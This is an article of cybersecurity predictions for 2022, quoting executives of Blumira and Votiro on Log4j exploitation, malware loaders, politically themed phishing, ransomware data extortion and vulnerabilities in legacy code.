Cybersecurity is a fast-paced field. Several high-profile ransomware attacks affecting global supply chains occurred in 2021, including assaults on Colonial Pipeline and JBS.
The year 2021 ended on a high note, with the discovery of numerous serious Log4j flaws. The consequences of those flaws will most likely last until 2022.
Matthew Warner, Blumira’s CTO and Co-Founder, and Aviv Grafi, Votiro’s CTO and Co-Founder, shared their cybersecurity predictions for 2022.
Prediction #1: Log4j will be weaponized
Unfortunately, threat actors took advantage of the Log4j vulnerabilities (also known as Log4Shell) revealed in December. Only a week after the initial vulnerability was found, Conti had constructed a comprehensive attack chain employing Log4j as an access point.
Log4j is a low-hanging fruit for opportunistic ransomware gangs looking to get access to an environment rapidly and solely for financial benefit.
“We’ll see ransomware operators use [Log4j] to see what they can grab,” said Matt Warner, Blumira’s CTO and Co-Founder.
“Advanced ransomware operators use it in some very clever ways to penetrate new environments.”
According to Aviv Grafi, CTO and Co-Founder of Votiro, “Log4Shell is not only one of the easiest remote code execution (RCE) vulnerabilities we’ve seen in the last several years.”
Because Log4j is such a widely used logging library, it’s intrinsically challenging for IT administrators to verify that their business is patched and secured.
As a result, detection is the best strategy to protect yourself from Log4j-related threats.
Prediction #2: Malware loaders and injection techniques will advance
Malware loaders are malicious programs that download an executable’s object files to a computer.
SquirrelWaffle, a loader that downloads malware like Qakbot or the pentesting tool Cobalt Strike, first appeared in the wild in late 2021.
SquirrelWaffle campaigns primarily rely on emails containing malicious hyperlinks or attachments that, when opened, execute obfuscated malware-retrieving code.
Understanding the cyber death chain and having the tools to detect behaviors linked with each stage are two pieces of advise that rarely change when it comes to preventing ransomware.
Endpoint detection and response (EDR) and multi-factor authentication are crucial security foundations to implement.
Monitoring behaviors linked with new malware and ransomware campaigns. For example process pivoting within Windows environments, should be a top priority for security and IT professionals.
Prediction #3: Malware campaigns will become political
Because 2022 is a midterm election year in the United States, we should expect phishing operations containing political propaganda.
“We’ve seen a lot of rise in ransomware assaults around propaganda, and Covid contributed to that,” Warner added.
“Because propaganda creates a narrative, it makes phishing easier for attackers.”
It’s still a flywheel for attackers to build up that logic and say. ‘This is how we can attack individuals with phishing.'”
In 2022, phishing attacks will almost certainly include political rhetoric, such as an email with the subject line “5 things you haven’t heard about your favorite candidate”. It urges victims to open dangerous links or attachments.
Prediction #4: Data will be the end game for ransomware operators
Attribution and extortion were less of a worry twenty years ago because there was no infrastructure for sharing or selling stolen data like there is today.
Ransomware is now primarily concerned with blackmailing victims, obtaining data, and doing more with that data.
“What we’ve learned over the previous 20 years is that that data has value, which attackers will exploit,” Warner said.
Small municipalities, local governments, and schools are typically the unwitting victims of the bystander effect. As they have important data that ransomware operators want.
In 2022, cybercriminals will continue to attack these industries.
“Securing environments against these threats necessitates broad visibility and risk mitigation activities that are tough for enterprises of all sizes to keep up with, particularly those with lower budgets and IT teams,” Warner added.
In 2022, ransomware operators will continue to use double extortion. It encrypts all data and threatens to disclose it in order to force businesses to pay the ransom.
The inevitable progression from holding data for ransom to blackmailing for data exposure is to hold data for ransom.
Prediction #5: Vulnerabilities in legacy code will keep coming
According to the US-CERT Vulnerability Database, 2021 was the year with the largest number of vulnerabilities ever.
Critical vulnerabilities arose during the year, ranging from several Log4j flaws to HiveNightmare and PrintNightmare.
Unfortunately, due to an increased focus on cybersecurity research and the inevitability of additional defects as more software is written.
However, the majority of vulnerabilities will most certainly be in legacy code, owing to the absence of safe coding technologies and processes available to developers twenty or thirty years ago.
“Every year, we talk about how that might be the last holy grail vulnerability.” Grafi added, “And we’re always surprised to see more.”
Click here to read more useful and interesting articles.